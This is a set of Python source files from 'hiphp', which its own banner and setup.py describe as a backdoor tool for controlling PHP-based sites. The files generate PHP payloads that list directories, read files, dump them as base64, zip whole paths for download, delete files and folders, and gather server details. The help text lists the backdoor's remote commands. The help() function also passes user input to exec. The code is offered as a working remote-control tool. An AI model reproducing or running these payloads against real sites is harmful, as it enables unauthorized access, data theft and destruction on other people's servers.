#!/usr/bin/env python
# coding:utf-8
#   |                                                         |   #
# --+---------------------------------------------------------+-- #
#   |    Code by: yasserbdj96                                 |   #
#   |    Email: yasser.bdj96@gmail.com                        |   #
#   |    GitHub: github.com/yasserbdj96                       |   #
#   |    Sponsor: github.com/sponsors/yasserbdj96             |   #
#   |    BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9      |   #
#   |                                                         |   #
#   |    All posts with #yasserbdj96                          |   #
#   |    All views are my own.                                |   #
# --+---------------------------------------------------------+-- #
#   |                                                         |   #

#START{
from hexor import *
from biglibrary import *

# logo:
def logo(__version__):
    logo=""
    c_red="#ea4335"#red
    c_blue="#4285f4"#blue
    c_yellow="#fbbc05"#yellow
    c_green="#34a853"#green
    c_white="#f7f7f7"

    color=hexor(True,"hex")
    bl=biglibrary(returning=True)
    logox="\n"
    logox+=color.c(bl.center("             ▄███████▄    ▄█    █▄       ▄███████▄"),c_red)
    logox+="\n"
    logox+=color.c(bl.center("            ███    ███   ███    ███     ███    ███"),c_red)
    logox+="\n"
    logox+=color.c(bl.center("╦   ╦       ███    ███   ███    ███     ███    ███"),c_red)
    logox+="\n"
    logox+=color.c(bl.center("║   ║ ═╦═ ▀█████████▀  ▀▀███▀▀▀▀███▀  ▀█████████▀ "),c_red)
    logox+="\n"
    logox+=color.c(bl.center("╠═══╣  ║    ███          ███    ███     ███       "),c_red)
    logox+="\n"
    logox+=color.c(bl.center("║   ║  ║    ███          ███    ███     ███       "),c_red)
    logox+="\n"
    logox+=color.c(bl.center("╩   ╩ ═╩═  ▄████▀        ███    █▀     ▄████▀     "),c_red)
    logox+="\n"
    logox+=color.c(bl.center("+-----------------------------------------------------------------------------------+"),c_red)
    logox+="\n"
    logox+=color.c(bl.center(f"HIPHP - Free & Open Source Project"),c_yellow)
    logox+="\n"
    logox+=color.c(bl.center(f"A Backdoor Tool for Controlling PHP-based Sites"),c_yellow)
    logox+="\n"
    logox+=color.c(bl.center(f"Version: {__version__} by yasserbdj96"),c_green)
    logox+="\n"
    logox+=color.c(bl.center(f"Visit: https://yasserbdj96.github.io/hiphp/"),c_blue)
    logox+="\n"
    logox+=color.c(bl.center("+-----------------------------------------------------------------------------------+"),c_red)
    logox+="\n"
    logox+=color.c("\n [!] '--help' for more informations.\n",c_yellow)
    logox+=color.c(" [!] '--exit' OR 'Ctrl+C' for exit.\n",c_yellow)
    #logox+="\n"

    return logox
#
try:
    import sys
    from hiphpversion import __version__
    if sys.argv[1]=="ok_view":
        print(logo(__version__))
except:
    pass
#}END.



#!/usr/bin/env python
# coding:utf-8
#   |                                                         |   #
# --+---------------------------------------------------------+-- #
#   |    Code by: yasserbdj96                                 |   #
#   |    Email: yasser.bdj96@gmail.com                        |   #
#   |    GitHub: github.com/yasserbdj96                       |   #
#   |    Sponsor: github.com/sponsors/yasserbdj96             |   #
#   |    BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9      |   #
#   |                                                         |   #
#   |    All posts with #yasserbdj96                          |   #
#   |    All views are my own.                                |   #
# --+---------------------------------------------------------+-- #
#   |                                                         |   #

#START{
errx="[✗]"
emsg_1=f"{errx} We were unable to recognize the hiphp identifier."
emsg_2=f"{errx} Command not found!"
emsg_3=f"{errx} We could not contact the site"
emsg_4=f"{errx} The file you entered does not exist."
emsg_5=f"{errx} We could not upload the file"
emsg_6=": Command does not exist or ended with a server error."

msgi="[!]"
msg_1=f"{msgi} Copy the PHP code below to the website path you entered:"
msg_2=f"{msgi} There is a new update "
msg_3=f"{msgi} Download the new version from 'https://github.com/yasserbdj96/hiphp'"
msg_4=f"{msgi} No updates available"

msgs="[✓]"
smsg_1=f"{msgs} File downloaded in: "
smsg_2=f"{msgs} The path has been compressed into: "
#}END.


#!/usr/bin/env python
# coding:utf-8
#   |                                                         |   #
# --+---------------------------------------------------------+-- #
#   |    Code by: yasserbdj96                                 |   #
#   |    Email: yasser.bdj96@gmail.com                        |   #
#   |    GitHub: github.com/yasserbdj96                       |   #
#   |    Sponsor: github.com/sponsors/yasserbdj96             |   #
#   |    BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9      |   #
#   |                                                         |   #
#   |    All posts with #yasserbdj96                          |   #
#   |    All views are my own.                                |   #
# --+---------------------------------------------------------+-- #
#   |                                                         |   #

#START{
import base64
import hashlib

#torot13:
def rot13(text):
    rot13=str.maketrans("ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz","NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm")
    return str.translate(text,rot13)

#tobase64:
def tobase64(data):
    return base64.b64encode(data.encode('utf-8')).decode('utf-8')

#from base64:
def fromb64(text):
    return base64.b64decode(text.encode('utf-8')).decode('utf-8')

#tomd5:
def tomd5(data):
    return hashlib.md5(data.encode('utf-8')).hexdigest()
#}END.



#!/usr/bin/env python
# coding:utf-8
#   |                                                         |   #
# --+---------------------------------------------------------+-- #
#   |    Code by: yasserbdj96                                 |   #
#   |    Email: yasser.bdj96@gmail.com                        |   #
#   |    GitHub: github.com/yasserbdj96                       |   #
#   |    Sponsor: github.com/sponsors/yasserbdj96             |   #
#   |    BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9      |   #
#   |                                                         |   #
#   |    All posts with #yasserbdj96                          |   #
#   |    All views are my own.                                |   #
# --+---------------------------------------------------------+-- #
#   |                                                         |   #

#START{
#
def scandir(dirx="./"):
    x="""
$path='"""+dirx+"""';
if(!is_dir($path)) {
    echo json_encode(["[✗] The Directory '{$path}' not exists"]);
    exit();
}

$fileList=array();
if($handle=opendir($path)){
    while(false!==($entry=readdir($handle))){
        if($entry!="." && $entry!=".."){
            if(is_dir($entry)){
                $entry=$path.$entry."/";
            }else{
                $entry=$path.$entry;
            }
            $fileList[]=$entry;
        }
    }
    closedir($handle);
}
echo json_encode($fileList);"""
    return x
#
def scandir_all(dirx="./"):
    x="""
function getDirContents($dir="./",$relativePath=false){

    if(!is_dir($dir)) {
        return ["[✗] The Directory '{$dir}' not exists"];
    }

    $fileList=array();
    $iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir));
    foreach($iterator as $file){
        if ($file->isDir()) continue;
        $path=$file->getPathname();
        if ($relativePath) {
            $path=str_replace($dir,'',$path);
            $path=ltrim($path, '/');
        }

        $perms = fileperms($path);

        switch ($perms & 0xF000) {
            case 0xC000: // socket
                $info = 's';
                break;
            case 0xA000: // symbolic link
                $info = 'l';
                break;
            case 0x8000: // regular
                $info = 'r';
                break;
            case 0x6000: // block special
                $info = 'b';
                break;
            case 0x4000: // directory
                $info = 'd';
                break;
            case 0x2000: // character special
                $info = 'c';
                break;
            case 0x1000: // FIFO pipe
                $info = 'p';
                break;
            default: // unknown
                $info = 'u';
        }

        // Owner
        $info .= (($perms & 0x0100) ? 'r' : '-');
        $info .= (($perms & 0x0080) ? 'w' : '-');
        $info .= (($perms & 0x0040) ?
                    (($perms & 0x0800) ? 's' : 'x' ) :
                    (($perms & 0x0800) ? 'S' : '-'));

        // Group
        $info .= (($perms & 0x0020) ? 'r' : '-');
        $info .= (($perms & 0x0010) ? 'w' : '-');
        $info .= (($perms & 0x0008) ?
                    (($perms & 0x0400) ? 's' : 'x' ) :
                    (($perms & 0x0400) ? 'S' : '-'));

        // World
        $info .= (($perms & 0x0004) ? 'r' : '-');
        $info .= (($perms & 0x0002) ? 'w' : '-');
        $info .= (($perms & 0x0001) ?
                    (($perms & 0x0200) ? 't' : 'x' ) :
                    (($perms & 0x0200) ? 'T' : '-'));

        $file_stats = stat($path);

        //
        $last_use=date('M d H:m',$file_stats["mtime"]);

        //
        $bytes=filesize($path);
        if ($bytes >= 1073741824){
            $bytes = number_format($bytes / 1073741824, 2) . ' GB';
        }elseif ($bytes >= 1048576){
            $bytes = number_format($bytes / 1048576, 2) . ' MB';
        }elseif ($bytes >= 1024){
            $bytes = number_format($bytes / 1024, 2) . ' KB';
        }elseif ($bytes > 1){
            $bytes = $bytes . ' bytes';
        }elseif ($bytes == 1){
                $bytes = $bytes . ' byte';
        }else{
            $bytes = '0 bytes';
        }

        if(strlen($bytes)<11){
            $s=11-strlen($bytes);
            $bytes=str_repeat(" ",$s).$bytes;
        }

        //
        $fileList[]=$info." ".$last_use." ".$bytes." ".$path;
    }
    return $fileList;
}
echo json_encode(getDirContents('"""+dirx+"""'));"""
    return x
#
def file_get_contents(dirx):
    return f"""echo file_get_contents('{dirx}');"""

def simulate_mv(path, newpath):
    php_code = f"""
    // Check if the source file or directory exists
    if (!file_exists('{path}')) {{
        echo "[✗] Source doesn't exist.";
        return;
    }}

    // Check if the destination exists
    if (file_exists('{newpath}')) {{
        echo "[!] Destination already exists. Please choose a different destination.";
        return;
    }}

    // Check if the source is a file
    if (is_file('{path}')) {{
        // Move the file to the destination
        if (rename('{path}', '{newpath}')) {{
            echo "[✓] File moved successfully.";
        }} else {{
            echo "[✗] Error moving the file.";
        }}
    }} elseif (is_dir('{path}')) {{
        // Move the directory to the destination
        if (mkdir('{newpath}') && rename('{path}', '{newpath}/' . basename('{path}'))) {{
            echo "[✓] Directory moved successfully.";
        }} else {{
            echo "[✗] Error moving the directory.";
        }}
    }} else {{
        echo "[✗] Unsupported source type.";
    }}
    """

    return php_code

#
def zip_path(path="./"):
    php_zip_code="""// Get real path for our folder
$rootPath = realpath('"""+path+"""');

$path_name=str_replace(DIRECTORY_SEPARATOR, '_', '"""+path+"""');

$hash=$path_name."_".date("ymdHis");

// Initialize archive object
$zip = new ZipArchive();
$zip->open($hash.'.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);

// Create recursive directory iterator
/** @var SplFileInfo[] $files */
$files = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($rootPath),
    RecursiveIteratorIterator::LEAVES_ONLY
);

foreach ($files as $name => $file)
{
    // Skip directories (they would be added automatically)
    if (!$file->isDir())
    {
        // Get real and relative path for current file
        $filePath = $file->getRealPath();
        $relativePath = substr($filePath, strlen($rootPath) + 1);

        // Add current file to archive
        $zip->addFile($filePath, $relativePath);
    }
}

// Zip archive will be created only after closing object
$zip->close();
echo $hash.".zip";"""
    return php_zip_code

#
def file_to_b64(path):
    code="""
$file='"""+path+"""';
$fp=fopen($file, "rb");
$binary=fread($fp,filesize($file));
echo base64_encode($binary);"""
    return code

#
def DIRECTORY_SEPARATOR():
    code="echo DIRECTORY_SEPARATOR;"
    return code

#
def rm(t,path):
    code1="""
$filename = '"""+path+"""';
if (unlink($filename)){
	echo 'The file "'.$filename.'" was deleted successfully!';
} else {
	echo 'There was a error deleting the file "'.$filename.'"';
}"""
    code2="""
function deleteDirectory($dir) {
    if (!file_exists($dir)) {
        return true;
    }
    if (!is_dir($dir)) {
        return unlink($dir);
    }
    foreach (scandir($dir) as $item) {
        if ($item == '.' || $item == '..') {
            continue;
        }
        if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) {
            return false;
        }
    }
    if (rmdir($dir)){
        echo 'The Directory "'.$dir.'" was deleted successfully!';
    }else{
        echo 'There was a error deleting the Directory "'.$dir.'"';
    }
}
deleteDirectory('"""+path+"""');
"""
    if t=="-f":
        return code1
    elif t=="-d":
        return code2


#
def php_info():
    code="""header('Content-type: text/plain');
    echo "OS : ".php_uname();
    echo "\n";
    echo "your_ip: ".$_SERVER['REMOTE_ADDR'];
    echo "\n";
    echo "HTTP_HOST : ".$_SERVER['HTTP_HOST'];
    echo "\n";
    echo "REQUEST_METHOD : ".$_SERVER['REQUEST_METHOD'];
    echo "\n";
    echo "SERVER_ADMIN : ".$_SERVER['SERVER_ADMIN'];
    echo "\n";
    echo "SERVER_PORT : ".htmlentities($_SERVER['SERVER_PORT'], ENT_QUOTES, 'UTF-8');
    echo "\n";
    echo "server_ip : ".gethostbyname($_SERVER["HTTP_HOST"]);
    echo "\n";
    echo "PHP_SELF : ".$_SERVER['PHP_SELF'];
    echo "\n";
    echo "GATEWAY_INTERFACE : ".$_SERVER['GATEWAY_INTERFACE'];
    echo "\n";
    echo "SERVER_ADDR : ".$_SERVER['SERVER_ADDR'];
    echo "\n";
    echo "SERVER_NAME : ".$_SERVER['SERVER_NAME'];
    echo "\n";
    echo "SERVER_PROTOCOL : ".$_SERVER['SERVER_PROTOCOL'];
    echo "\n";
    echo "REQUEST_TIME : ".$_SERVER['REQUEST_TIME'];
    echo "\n";
    echo "QUERY_STRING : ".$_SERVER['QUERY_STRING'];
    echo "\n";
    echo "HTTP_ACCEPT : ".$_SERVER['HTTP_ACCEPT'];
    echo "\n";
    echo "HTTP_ACCEPT_CHARSET : ".$_SERVER['HTTP_ACCEPT_CHARSET'];
    echo "\n";
    echo "HTTP_REFERER : ".$_SERVER['HTTP_REFERER'];
    echo "\n";
    echo "HTTPS : ".$_SERVER['HTTPS'];
    echo "\n";
    echo "REMOTE_HOST : ".$_SERVER['REMOTE_HOST'];
    echo "\n";
    echo "REMOTE_PORT : ".$_SERVER['REMOTE_PORT'];
    echo "\n";
    echo "SCRIPT_FILENAME : ".$_SERVER['SCRIPT_FILENAME'];
    echo "\n";
    echo "SERVER_SIGNATURE : ".$_SERVER['SERVER_SIGNATURE'];
    echo "\n";
    echo "PATH_TRANSLATED : ".$_SERVER['PATH_TRANSLATED'];
    echo "\n";
    echo "SCRIPT_NAME : ".$_SERVER['SCRIPT_NAME'];
    echo "\n";
    echo "SCRIPT_URI : ".$_SERVER['SCRIPT_URI'];
    echo "\n";
    echo "server_software : ".getenv("SERVER_SOFTWARE");
    echo "\n";
    echo "Php Version : ".phpversion();
    echo "\n";
    echo "Zend : ".htmlentities(zend_version(), ENT_QUOTES, 'UTF-8');
    echo "\n";
    echo "Oracle : ".$Oracle2=function_exists('ocilogon')?("ON"):("OFF");   
    echo "\n";
    echo "MySQL : ".$MySQL2=function_exists('mysql_connect')?("ON"):("OFF");
    echo "\n";
    echo "MSSQL : ".$MSSQL2=function_exists('mssql_connect')?("ON"):("OFF");
    echo "\n";
    echo "PostgreSQL : ".$pg_connect2=function_exists('pg_connect')?("ON"):("OFF");
    echo "\n";
    echo "disabled_functions : ".$r=ini_get('disable_functions') ? ini_get('disable_functions'):'none';
    echo "\n";
    echo "DIRECTORY_SEPARATOR : ".DIRECTORY_SEPARATOR;"""
    return code
#}END.



#!/usr/bin/env python
# coding:utf-8
#   |                                                         |   #
# --+---------------------------------------------------------+-- #
#   |    Code by: yasserbdj96                                 |   #
#   |    Email: yasser.bdj96@gmail.com                        |   #
#   |    GitHub: github.com/yasserbdj96                       |   #
#   |    Sponsor: github.com/sponsors/yasserbdj96             |   #
#   |    BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9      |   #
#   |                                                         |   #
#   |    All posts with #yasserbdj96                          |   #
#   |    All views are my own.                                |   #
# --+---------------------------------------------------------+-- #
#   |                                                         |   #

# Link to the source code of this file: https://github.com/maksimKorzh/edit
# This code has been modified by: yasserbdj96 (https://github.com/yasserbdj96)

#START{
def editor(stdscr):
  import curses, traceback
  xxvo=True
  s = curses.initscr(); s.nodelay(1); curses.noecho(); curses.raw(); s.keypad(1)
  b = []; src = 'none.txt'; R, C = s.getmaxyx(); x, y, r, c = [0] * 4
  #if len(sys.argv) == 2: src = sys.argv[1]
  src=stdscr
  try:
    #with open(sys.argv[1]) as f:
    with open(src) as f:
      cont = f.read().split('\n'); cont = cont[:-1] if len(cont) > 1 else cont
      for rw in cont: b.append([ord(c) for c in rw])
  except: b.append([])
  #if len(sys.argv) == 1: b.append([])
  while xxvo==True:
    s.move(0, 0)
    if r < y: y = r
    if r >= y + R: y = r - R+1
    if c < x: x = c
    if c >= x + C: x = c - C+1
    for rw in range(R):
      brw = rw + y
      for cl in range(C):
        bcl = cl + x
        try: s.addch(rw, cl, b[brw][bcl])
        except: pass
      s.clrtoeol()
      try: s.addch('\n')
      except: pass
    curses.curs_set(0); s.move(r-y, c-x); curses.curs_set(1); s.refresh(); ch = -1
    while (ch == -1): ch = s.getch()
    if ch != ((ch) & 0x1f) and ch < 128: b[r].insert(c, ch); c += 1
    elif chr(ch) in '\n\r': l = b[r][c:]; b[r] = b[r][:c]; r += 1; c = 0; b.insert(r, [] + l)
    elif ch in [8, 263]:
      if c: c -= 1; del b[r][c]
      elif r: l = b[r][c:];  del b[r]; r -= 1; c = len(b[r]); b[r] += l
    elif ch  == curses.KEY_LEFT:
      if c != 0: c -= 1
      elif r > 0: r -= 1; c = len(b[r])
    elif ch == curses.KEY_RIGHT:
      if c < len(b[r]): c += 1
      elif r < len(b)-1: r += 1; c = 0
    elif ch == curses.KEY_UP and r != 0: r -= 1
    elif ch == curses.KEY_DOWN and r < len(b)-1: r += 1
    rw = b[r] if r < len(b) else None; rwlen = len(rw) if rw is not None else 0
    if c > rwlen: c = rwlen 
    if ch == (ord('q') & 0x1f): xxvo=False
    elif ch == (ord('s') & 0x1f):
      cont = ''
      for l in b: cont += ''.join([chr(c) for c in l]) + '\n'
      with open(src, 'w') as f:
        f.write(cont)
        xxvo=False
  curses.endwin()
#editor("vvvv.py")
#curses.wrapper(main)
#}END.


#!/usr/bin/env python
# coding:utf-8
#   |                                                         |   #
# --+---------------------------------------------------------+-- #
#   |    Code by: yasserbdj96                                 |   #
#   |    Email: yasser.bdj96@gmail.com                        |   #
#   |    GitHub: github.com/yasserbdj96                       |   #
#   |    Sponsor: github.com/sponsors/yasserbdj96             |   #
#   |    BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9      |   #
#   |                                                         |   #
#   |    All posts with #yasserbdj96                          |   #
#   |    All views are my own.                                |   #
# --+---------------------------------------------------------+-- #
#   |                                                         |   #

#START{
def help(__version__,opt=""):
  #
  spsbar=""""""

  #
  header=f"""HIPHP v{__version__} - (C) 2010-2023 yasserbdj96
GitHub: https://github.com/yasserbdj96/hiphp
"""

  #
  OPTIONS="""
Commands:

  --help, help                       # Display this help.
  --help [ACTIONS], help [ACTIONS]   # Help for a specific command.
  --geth, geth                       # Get the HIPHP_HOLE_CODE (same purpose as --geth).
  --phpinfo, phpinfo                 # Display information about the server.
  --cls, cls                         # Clear the console.
  --exit, exit                       # Exit the console.
"""

  #
  ACTIONS="""
Actions:
"""

  #
  ls_c="""
  --ls, ls                           # List files and folders (current directory by default).
  Usage: --ls [OPTION] [PATH], ls [OPTION] [PATH]
    --ls                             # List all files and folders in the current directory.
    --ls [PATH]                      # List all files and folders in the specified directory.
    --ls -all                        # List all files, folders, and subfolders in the current directory.
    --ls -all [PATH]                 # List all files, folders, and subfolders in the specified directory.
"""

  #
  cat_c="""
  --cat, cat                         # Concatenate a file to standard output.
  Usage: --cat [FILE_PATH]
"""

  #
  set_c="""
  --set, set                         # Create a code snippet that is always saved during work.
  Usage: --set [PHP_CODE]
  To reset to the initial value, use "--dset" or "dset".
"""

  #
  cd_c="""
  --cd, cd                           # Change directory.
  Usage: --cd [PATH]
"""

  #
  rf_c="""
  --rf, rf, run                      # Run code from a file.
  Usage: --rf [FILE_PATH] [VARIABLES]
    --rf [FILE_PATH]                 # Run code from a file.
    --rf [FILE_PATH] [VARIABLES]     # Run code from a file with variables (e.g., --rf example.php var==hello).
  """

  #
  up_c="""
  --up, up, upload                   # Upload a file.
  Usage: --up [FILE_PATH] [PATH]
    --up [FILE_PATH]                 # Upload a file to the current directory.
    --up [FILE_PATH] [PATH]          # Upload a file to a specified directory.
"""

  #
  down_c="""
  --down, down, download             # Download a file.
  Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH]
    --down -f [FILE_PATH]            # Download a file to the current directory.
    --down -f [FILE_PATH] [OUT_PATH] # Download a file to a specified directory.
    --down -d [DIR_PATH]             # Download a folder to the current directory.
    --down -d [DIR_PATH] [OUT_PATH]  # Download a folder to a specified directory.
    --down -all                      # Download all files to the current directory.
    --down -all [OUT_PATH]           # Download all files to a specified directory.
"""

  #
  zip_c="""
  --zip, zip                         # Compress a directory.
  Usage: --zip [DIR_PATH]
    --zip                            # Compress the current directory.
    --zip [DIR_PATH]                 # Compress a specific directory.
"""

#
  edt_c="""
  --edt, edt, edit                   # Edit files.
  Usage: --edt [FILE_PATH]
    CTRL+q                           # Exit the editor.
    CTRL+s                           # Save the changes.
"""

#
  rm_c="""
  --rm, rm, delete                   # Delete files and folders.
  Usage: --rm [-f/-d] [FILE/DIR_PATH]
    --rm -f [FILE_PATH]              # Delete a file.
    --rm -d [DIR_PATH]               # Delete a folder.
"""

#
  mv_c="""
  --mv, mv                           # Move files and folders.
  Usage: --mv [SOURCE] [DESTINATION]
"""

  #
  ABOUT="""
About:

  --update, update                   # Check for updates.
  --license, license                 # View the project license.
  --about, about                     # About this project.
  --version, version                 # Get the current version number."""

  if opt=="":
    return header+OPTIONS+ACTIONS+ls_c+spsbar+cat_c+spsbar+set_c+spsbar+cd_c+spsbar+rf_c+spsbar+up_c+spsbar+down_c+spsbar+zip_c+spsbar+edt_c+spsbar+rm_c+spsbar+mv_c+spsbar+ABOUT
  else:
    opt=opt.replace("--","")
    opt=opt+"_c"
    x=""
    exec(f"print({opt})")
#}END.


#!/usr/bin/env python
# coding:utf-8
#   |                                                         |   #
# --+---------------------------------------------------------+-- #
#   |    Code by: yasserbdj96                                 |   #
#   |    Email: yasser.bdj96@gmail.com                        |   #
#   |    GitHub: github.com/yasserbdj96                       |   #
#   |    Sponsor: github.com/sponsors/yasserbdj96             |   #
#   |    BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9      |   #
#   |                                                         |   #
#   |    All posts with #yasserbdj96                          |   #
#   |    All views are my own.                                |   #
# --+---------------------------------------------------------+-- #
#   |                                                         |   #

#START{
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup

# initialize the set of links (unique links)
internal_urls = set()
external_urls = set()


def is_valid(url):
    """
    Checks whether `url` is a valid URL.
    """
    parsed = urlparse(url)
    return bool(parsed.netloc) and bool(parsed.scheme)


def get_all_website_links(url):
    """
    Returns all URLs that is found on `url` in which it belongs to the same website
    """
    # all URLs of `url`
    urls = set()
    soup = BeautifulSoup(requests.get(url).content, "html.parser")
    for a_tag in soup.findAll("a"):
        href = a_tag.attrs.get("href")
        if href == "" or href is None:
            # href empty tag
            continue
        # join the URL if it's relative (not absolute link)
        href = urljoin(url, href)
        parsed_href = urlparse(href)
        # remove URL GET parameters, URL fragments, etc.
        href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
        if not is_valid(href):
            # not a valid URL
            continue
        if href in internal_urls:
            # already in the set
            continue
        if urlparse(url).netloc not in href:
            # external link
            if href not in external_urls:
                #print(f"[!] External link: {href}")
                external_urls.add(href)
            continue
        #print(f"[*] Internal link: {href}")
        if "mailto://" not in href:
            urls.add(href)
            internal_urls.add(href)
    return urls

#print(crawl("https://asciinema.org/"))
#}END.


#!/usr/bin/env python
# coding:utf-8
#   |                                                         |   #
# --+---------------------------------------------------------+-- #
#   |    Code by: yasserbdj96                                 |   #
#   |    Email: yasser.bdj96@gmail.com                        |   #
#   |    GitHub: github.com/yasserbdj96                       |   #
#   |    Sponsor: github.com/sponsors/yasserbdj96             |   #
#   |    BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9      |   #
#   |                                                         |   #
#   |    All posts with #yasserbdj96                          |   #
#   |    All views are my own.                                |   #
# --+---------------------------------------------------------+-- #
#   |                                                         |   #

#START{
from hiphp.hiphpversion import __version__
from setuptools import setup,find_packages

setup(
    name="hiphp",
    version=__version__,
    author="yasserbdj96",
    author_email="yasser.bdj96@gmail.com",
    description='''hiphp - free & open source project for create a BackDoor to control PHP-based sites.''',
    long_description_content_type="text/markdown",
    long_description=open('README_PYPI.md','r', encoding="utf8").read(),
    license='''MIT License''',
    packages=find_packages(),
    project_urls={
        'Source': "https://github.com/yasserbdj96/hiphp",
        'WebSite': "https://yasserbdj96.github.io/hiphp",
        'Documentation': "https://yasserbdj96.github.io/hiphp",
        'Chat': "https://gitter.im/yasserbdj96/hiphp",
        'Author WebSite':"https://yasserbdj96.github.io/",
        'Sponsor': "https://github.com/sponsors/yasserbdj96"
    },
    install_requires=["requests","hexor","biglibrary","BeautifulSoup4","asciitext"],
    keywords = ["HIPHP BackDoor", "Open-source tool", "Remote control", "PHP programming", "HTTP/HTTPS protocol", "POST/GET method", "Port 80", "File download", "File editing", "Tor networks", "Password protection", "Webmasters", "Third-party software", "User-friendly", "Access rights", "Directory structure", "Flexibility", "Security", "Compatibility", "Content management"],
    classifiers=[
        "Environment :: Web Environment",
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "Natural Language :: English",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Programming Language :: Python :: 3.11",
        "Programming Language :: Python :: 3 :: Only",
        "Operating System :: Unix",
        "Operating System :: MacOS :: MacOS X",
        "Operating System :: Microsoft :: Windows",
        "Topic :: Software Development :: Build Tools",
        "Topic :: Software Development :: Libraries",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: Internet :: WWW/HTTP"
    ],
    #python_requires=">=3.9"
)
#}END.
